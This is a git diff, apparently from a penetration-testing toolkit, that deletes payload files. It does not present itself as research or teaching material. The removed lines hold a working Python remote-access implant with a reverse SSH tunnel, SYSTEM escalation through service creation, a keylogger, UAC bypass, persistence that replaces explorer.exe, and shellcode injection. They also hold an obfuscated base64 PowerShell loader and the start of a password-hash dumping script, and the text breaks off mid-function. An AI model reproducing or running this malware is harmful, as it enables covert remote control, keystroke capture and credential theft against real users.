client.connect(server[0], server[ - 1], username=ssh_server_username, key_filename=None, look_for_keys=False, password=password) - - # except exception - except Exception as e: - if verbose == True: - print('*** Failed to connect to %s:%d: %r' % (server[0], server[1], e)) - try: - reverse_forward_tunnel(ssh_server_tunnel_port, remote[ - 0], remote[1], client.get_transport()) - - # except exception - except Exception as e: - if verbose == True: - print(e) - - # have to pass some garbage to start thread - garbage_one = "" - garbage_two = "" - garbage_three = "" - - # start a new thread to ensure that when we establish an SSH tunnel we can continue - # to leverage SET interactive shell. - # this starts the main routine which is where we get all - # our port forward stuff - thread.start_new_thread( - main, (garbage_one, garbage_two, garbage_three)) - - # except exception - except Exception as e: - if verbose == True: - print(e) - - # lock the workstation of victim - if data == "lockworkstation": - ctypes.windll.user32.LockWorkStation() - - # elevate permissions - if data == "getsystem": - try: - temp_path = os.getenv('TEMP') - - # this is our shell exectuable - set_payload = temp_path + "\\" + \ - generate_random_string(10, 15) + ".exe" - - # accept the file and write it do disk as the set_payload - # variable - upload_file(set_payload) - - # sleep 0.5 seconds - time.sleep(0.5) - - # this will spawn the shell in a seperate process thread as - # SYSTEM - def getsystem(set_payload, ipaddr): - # generate a random string between 10 and 15 length - service_name = generate_random_string(10, 15) - # create a service - subprocess.Popen('sc create %s binpath= "cmd /c %s %s" type= own' % - (service_name, set_payload, ipaddr), shell=True).wait() - - # start the service, don't wait for it to finish - subprocess.Popen("sc start %s" % - (service_name), shell=True) - - # define data as a received information from attacker - # machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be sent - data = decrypt_packet(data, encryption, cipher) - - # this will be our ipaddress and port - data = sockobj.recv(1024) - - # decrypted file path - data = decrypt_packet(data, encryption, cipher) - - # this is our ipaddress and port - ipaddr = data - - # - # start a new thread - # - thread.start_new_thread(getsystem, (set_payload, ipaddr)) - - # handle error messages - except Exception as e: - if verbose == True: - print(e) - pass - - # keystroke logging - if data == "keystroke_start": - - # TEMP directory - temp_path = os.getenv('TEMP') - - # this is the log file - global logfile - logfile = temp_path + "\\" + generate_random_string(10, 15) - - # trigger an event - def OnKeyboardEvent(event): - - filewrite = open(logfile, "a") - filewrite.write(chr(event.Ascii)) - filewrite.close() - return True - - # start keystroke logging - def start_keystroke(garbage1, garbage2, garbage3): - - hm = pyHook.HookManager() - hm.KeyDown = OnKeyboardEvent - hm.HookKeyboard() - pythoncom.PumpMessages() - - # need to pass vars to meet threading requirements - garbage1 = "" - garbage2 = "" - garbage3 = "" - - # start the keystroke logger - thread.start_new_thread( - start_keystroke, (garbage1, garbage2, garbage3)) - - # dump keystrokes - if data == "keystroke_dump": - - # set a flag to test if we ran keystroke_start first - flag = 0 - # try to see if logfile is there - try: - logfile - except: - flag = 1 - - # if we are all set - if flag == 0: - - # open the logfile - if os.path.isfile(logfile): - fileopen = open(logfile, "r") - - # read all the data - data = fileopen.read() - - # if we found nothing yet - if data == "": - data = "[!] There is no captured keystrokes yet." - - if not os.path.isfile(logfile): - data = "[!] There is no captured keystrokes yet." - - send_packet(data, sockobj, encryption, cipher) - - # if we didn't start the keystroke - if flag == 1: - send_packet( - "[!] It doesn't appear keystroke_start is running, did you execute the command?", sockobj, encryption, cipher) - - # bypass windows uac - if data == "bypassuac": - # try block - try: - - # TEMP directory - temp_path = os.getenv('TEMP') - - # this is our bypass uac executable - bypassuac = temp_path + "\\" + \ - generate_random_string(10, 15) + ".exe" - - # this is our actual SET payload to be executed with UAC - # safe stuff - set_payload = temp_path + "\\" + \ - generate_random_string(10, 15) + ".exe" - - # upload our files first is bypass uac - upload_file(bypassuac) - - # sleep 0.5 seconds - time.sleep(0.5) - - # set payload - upload_file(set_payload) - - # this will spawn the shell in a seperate process thread - def launch_uac(bypassuac, set_payload, ipaddress): - subprocess.Popen( - "%s /c %s %s" % (bypassuac, set_payload, ipaddress), shell=True).wait() - - # define data as a received information from attacker - # machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be sent - data = decrypt_packet(data, encryption, cipher) - - # this will be our ipaddress and port - data = sockobj.recv(1024) - - # decrypted file path - data = decrypt_packet(data, encryption, cipher) - - # this is our ipaddress and port - ipaddr = data - - # - # start a new thread - # - thread.start_new_thread( - launch_uac, (bypassuac, set_payload, ipaddr)) - - # handle error messages - except Exception as e: - if verbose == True: - print(e) - pass - - # remov for SET - if data == "removepersistence": - # try block - try: - # WINDIR directory - windir_path = os.getenv('WINDIR') - # this is our SET interactive service executable - # set_service = windir_path + "\\system32\\" + generate_random_string(10,15) + ".exe" - set_service = windir_path + "\\system32\\" + "explorer.exe" - subprocess.Popen("%s stop" % ( - set_service), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - subprocess.Popen("%s remove" % ( - set_service), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - - # handle error messages - except Exception as e: - if verbose == True: - print(e) - pass - - # persistence for SET - if data == "persistence": - # try block - try: - - # WINDIR directory - windir_path = os.getenv('WINDIR') - - # enumerate home directory - homedir_path = os.getenv("SystemDrive") - homedir_path = homedir_path + "\\Program Files\\Common Files\\" - - # see if we are running vista/windows 7 (potential for UAC) - os_counter = 0 - - # see if its vista or windows 7 - if os.path.isdir(homedir_path): - os_counter = 1 - set_service = homedir_path + "explorer.exe" - set_shell = homedir_path + \ - generate_random_string(10, 15) + ".exe" - - # this is our SET interactive service executable - # if its at system32 - if os_counter == 0: - if os.path.isdir("%s\\system32" % (windir_path)): - set_service = windir_path + "\\system32\\" + "explorer.exe" - - # this is the SET interactive shell - set_shell = windir_path + "\\system32\\" + \ - generate_random_string(10, 15) + ".exe" - - # upload the persistence set interactive shell - upload_file(set_service) - - # sleep 0.5 seconds - time.sleep(0.5) - - # upload our SET interactive service - upload_file(set_shell) - - # define data as a received information from attacker - # machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be sent - data = decrypt_packet(data, encryption, cipher) - - # this will be our ipaddress and port - data = sockobj.recv(1024) - - # decrypted file path - data = decrypt_packet(data, encryption, cipher) - - # this is our ipaddress and port - ipaddr = data - #ipaddr = set_shell + " " + ipaddr - if os_counter == 0: - filewrite = open("%s\\system32\\isjxwqjs" % - (windir_path), "w") - if os_counter == 1: - filewrite = open("%sisjxwqjs" % (homedir_path), "w") - filewrite.write('"' + set_shell + '"' + " " + ipaddr) - filewrite.close() - time.sleep(2) - # automatically start service - subprocess.Popen('"%s" --startup auto install' % (set_service), shell=True, - stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - time.sleep(5) - # start the service - subprocess.Popen('"%s" start' % ( - set_service), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - - # handle error messages - except Exception as e: - if verbose == True: - print(e) - pass - - # if the attacker specifies a command shell lets get it ready - if data == "ps": - try: - # if we're running windows then use win32process to - # enumerate - if operating_system == "windows": - processes = win32process.EnumProcesses() - data = "" - for pid in processes: - try: - handle = win32api.OpenProcess( - win32con.PROCESS_ALL_ACCESS, False, pid) - exe = win32process.GetModuleFileNameEx( - handle, 0) - data += exe + " PID:" + str(pid) + "\r\n" - except: - pass - - # if we're running linux then run subprocess ps -aux to - # enumerate - if operating_system == "posix": - - # send our command that would be 'data' - proc = subprocess.Popen( - "ps -ax", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - - # communicate with stdout and send it back to attacker - stdout_value = proc.stdout.read() - - # if we have an error just append to nothing if needed - stdout_value += proc.stderr.read() - - # send the data back - data = stdout_value - - # send our data - send_packet(data, sockobj, encryption, cipher) - - except Exception as e: - if verbose == True: - print(e) - - # if we want to kill a process - if data == "kill": - try: - # recv initial length of next socket - data = sockobj.recv(1024) - data = decrypt_packet(data, encryption, cipher) - # this should be our pid to kill - data = sockobj.recv(int(data)) - pid = decrypt_packet(data, encryption, cipher) - - # if we're running windows then use win32api to kill and - # terminate process - if operating_system == "windows": - # specify handler as the process id received - handler = win32api.OpenProcess( - win32con.PROCESS_TERMINATE, 0, int(pid)) - # kill the process through the win32api - # TerminatorProcess function call - win32api.TerminateProcess(handler, 0) - - # if we're running linux then run kill -9 - if operating_system == "posix": - subprocess.Popen("kill -9 %s" % (pid), shell=True) - - data = "Confirmed kill" - # send our data - send_packet(data, sockobj, encryption, cipher) - - # except exception - except Exception as e: - if verbose == True: - print(e) - sys.exit() - - # this is for rebooting the server - if data == "reboot": - try: - # if we're running windows then use win32process to - # enumerate - if operating_system == "windows": - RebootServer() - data = "[*] Server has been rebooted." - - # if we're running linux then run subprocess ps -aux to - # enumerate - if operating_system == "posix": - - # send our command that would be 'data' - proc = subprocess.Popen( - "reboot now", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - - # send the data back - data = "[*] Server has been rebooted." - - # send our data - send_packet(data, sockobj, encryption, cipher) - - except Exception as e: - if verbose == True: - print(e) - - # this section is if the attacker wants to upload a file - if data == "shellcode": - # try block - try: - - # define data as a received information from attacker - # machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be sent - data = decrypt_packet(data, encryption, cipher) - - # here is an ugly hack but it works, basically we set two - # counters. MSGLEN which will eventually equal the length - # of what number was sent to us which represented the length - # of the output of the shell command we executed. Dataout - # will eventually equal the entire string loaded into our - # buffer then sent for decryption. - # - # A loop is started which continues to receive until we hit - # the length of what our entire full encrypted shell output - # is equaled. Once that occurs, we are out of our loop and - # the full string is sent to the decryption routine and - # presented back to us. - - MSGLEN = 0 - dataout = "" - length = int(data) - while MSGLEN != length: - data = sockobj.recv(1024) - dataout += data - MSGLEN = MSGLEN + len(data) - - data = decrypt_packet(dataout, encryption, cipher) - - shellcode = bytearray("%s" % (data)) - - # awesome shellcode injection code - # http://www.debasish.in/2012/04/execute-shellcode-using-python.html - ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), - ctypes.c_int( - len(shellcode)), - ctypes.c_int( - 0x3000), - ctypes.c_int(0x40)) - - ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), - ctypes.c_int(len(shellcode))) - - buf = (ctypes.c_char * len(shellcode) - ).from_buffer(shellcode) - - ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), - buf, - ctypes.c_int(len(shellcode))) - - ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), - ctypes.c_int(0), - ctypes.c_int(ptr), - ctypes.c_int(0), - ctypes.c_int(0), - ctypes.pointer(ctypes.c_int(0))) - - ctypes.windll.kernel32.WaitForSingleObject( - ctypes.c_int(ht), ctypes.c_int(-1)) - - # handle error messages - except Exception as e: - if verbose == True: - print(e) - pass - -# keyboard interrupts here -except KeyboardInterrupt: - if verbose == True: - print("[!] KeyboardInterrupt detected. Bombing out of the interactive shell.") - -# handle exceptions -except Exception as e: - if verbose == True: - print(e) - sys.exit() diff --git a/src/payloads/set_payloads/shell.windows b/src/payloads/set_payloads/shell.windows deleted file mode 100755 index 9554adcc8..000000000 Binary files a/src/payloads/set_payloads/shell.windows and /dev/null differ diff --git a/src/payloads/set_payloads/uac_bypass/x64.binary b/src/payloads/set_payloads/uac_bypass/x64.binary deleted file mode 100755 index 8ac912bb3..000000000 Binary files a/src/payloads/set_payloads/uac_bypass/x64.binary and /dev/null differ diff --git a/src/payloads/set_payloads/uac_bypass/x86.binary b/src/payloads/set_payloads/uac_bypass/x86.binary deleted file mode 100755 index de6211aba..000000000 Binary files a/src/payloads/set_payloads/uac_bypass/x86.binary and /dev/null differ diff --git a/src/powershell/powerdump.encoded b/src/powershell/powerdump.encoded deleted file mode 100644 index 367dc4a14..000000000 --- a/src/powershell/powerdump.encoded +++ /dev/null @@ -1,2 +0,0 @@ -powershell -NoExit -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"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\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();clear;\"Load complete.\"" - diff --git a/src/powershell/powerdump.powershell b/src/powershell/powerdump.powershell deleted file mode 100644 index f20e00a13..000000000 --- a/src/powershell/powerdump.powershell +++ /dev/null @@ -1,366 +0,0 @@ -# -# PowerShell CreateCmd Bypass by Kathy Peters, Josh Kelley (winfang) and Dave Kennedy (ReL1K) -# Defcon Release -# -# -# -function LoadApi -{ - $oldErrorAction = $global:ErrorActionPreference; - $global:ErrorActionPreference = "SilentlyContinue"; - $test = [PowerDump.Native]; - $global:ErrorActionPreference = $oldErrorAction; - if ($test) - { - # already loaded - return; - } - -$code = @' -using System; -using System.Security.Cryptography; -using System.Runtime.InteropServices; -using System.Text; - -namespace PowerDump -{ - public class Native - { - [DllImport("advapi32.dll", CharSet = CharSet.Auto)] - public static extern int RegOpenKeyEx( - int hKey, - string subKey, - int ulOptions, - int samDesired, - out int hkResult); - - [DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")] - extern public static int RegEnumKeyEx( - int hkey, - int index, - StringBuilder lpName, - ref int lpcbName, - int reserved, - StringBuilder lpClass, - ref int lpcbClass, - out long lpftLastWriteTime); - - [DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)] - extern public static int RegQueryInfoKey( - int hkey, - StringBuilder lpClass, - ref int lpcbClass, - int lpReserved, - out int lpcSubKeys, - out int lpcbMaxSubKeyLen, - out int lpcbMaxClassLen, - out int lpcValues, - out int lpcbMaxValueNameLen, - out int lpcbMaxValueLen, - out int lpcbSecurityDescriptor, - IntPtr lpftLastWriteTime); - - [DllImport("advapi32.dll", SetLastError=true)] - public static extern int RegCloseKey( - int hKey); - - } - } // end namespace PowerDump - - public class Shift { - public static int Right(int x, int count) { return x >> count; } - public static uint Right(uint x, int count) { return x >> count; } - public static long Right(long x, int count) { return x >> count; } - public static ulong Right(ulong x, int count) { return x >> count; } - public static int Left(int x, int count) { return x << count; } - public static uint Left(uint x, int count) { return x << count; } - public static long Left(long x, int count) { return x << count; } - public static ulong Left(ulong x, int count) { return x << count; } - } -'@ - - $provider = New-Object Microsoft.CSharp.CSharpCodeProvider - $dllName = [PsObject].Assembly.Location - $compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters - $assemblies = @("System.dll", $dllName) - $compilerParameters.ReferencedAssemblies.AddRange($assemblies) - $compilerParameters.GenerateInMemory = $true - $compilerResults = $provider.CompileAssemblyFromSource($compilerParameters, $code) - if($compilerResults.Errors.Count -gt 0) { - $compilerResults.Errors | % { Write-Error ("{0}:`t{1}" -f $_.Line,$_.ErrorText) } - } - -} - -$antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0"); -$almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0"); -$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee); -$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0); -$odd_parity = @( - 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, - 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31, - 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47, - 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62, - 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79, - 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94, - 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110, - 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127, - 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143, - 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158, - 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174, - 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191, - 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206, - 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223, - 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239, - 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254 -); - -function sid_to_key($sid) -{ - $s1 = @(); - $s1 += [char]($sid -band 0xFF); - $s1 += [char]([Shift]::Right($sid,8) -band 0xFF); - $s1 += [char]([Shift]::Right($sid,16) -band 0xFF); - $s1 += [char]([Shift]::Right($sid,24) -band 0xFF); - $s1 += $s1[0]; - $s1 += $s1[1]; - $s1 += $s1[2]; - $s2 = @(); - $s2 += $s1[3]; $s2 += $s1[0]; $s2 += $s1[1]; $s2 += $s1[2]; - $s2 += $s2[0]; $s2 += $s2[1]; $s2 += $s2[2]; - return ,((str_to_key $s1),(str_to_key $s2)); -} - -function str_to_key($s) -{ - $key = @(); - $key += [Shift]::Right([int]($s[0]), 1 ); - $key += [Shift]::Left( $([int]($s[0]) -band 0x01), 6) -bor [Shift]::Right([int]($s[1]),2); - $key += [Shift]::Left( $([int]($s[1]) -band 0x03), 5) -bor [Shift]::Right([int]($s[2]),3); - $key += [Shift]::Left( $([int]($s[2]) -band 0x07), 4) -bor [Shift]::Right([int]($s[3]),4); - $key += [Shift]::Left( $([int]($s[3]) -band 0x0F), 3) -bor [Shift]::Right([int]($s[4]),5); - $key += [Shift]::Left( $([int]($s[4]) -band 0x1F), 2) -bor [Shift]::Right([int]($s[5]),6); - $key += [Shift]::Left( $([int]($s[5]) -band 0x3F), 1) -bor [Shift]::Right([int]($s[6]),7); - $key += $([int]($s[6]) -band 0x7F); - 0..7 | %{ - $key[$_] = [Shift]::Left($key[$_], 1); - $key[$_] = $odd_parity[$key[$_]]; - } - return ,$key; -} - -function NewRC4([byte[]]$key) -{ - return new-object Object | - Add-Member NoteProperty key $key -PassThru | - Add-Member NoteProperty S $null -PassThru | - Add-Member ScriptMethod init { - if (-not $this.S) - { - [byte[]]$this.S = 0..255; - 0..255 | % -begin{[long]$j=0;}{ - $j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length; - $temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp; - } - } - } -PassThru | - Add-Member ScriptMethod "encrypt" { - $data = $args[0]; - $this.init(); - $outbuf = new-object byte[] $($data.Length); - $S2 = $this.S[0..$this.S.Length]; - 0..$($data.Length-1) | % -begin{$i=0;$j=0;} { - $i = ($i+1) % $S2.Length; - $j = ($j + $S2[$i]) % $S2.Length; - $temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp; - $a = $data[$_]; - $b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ]; - 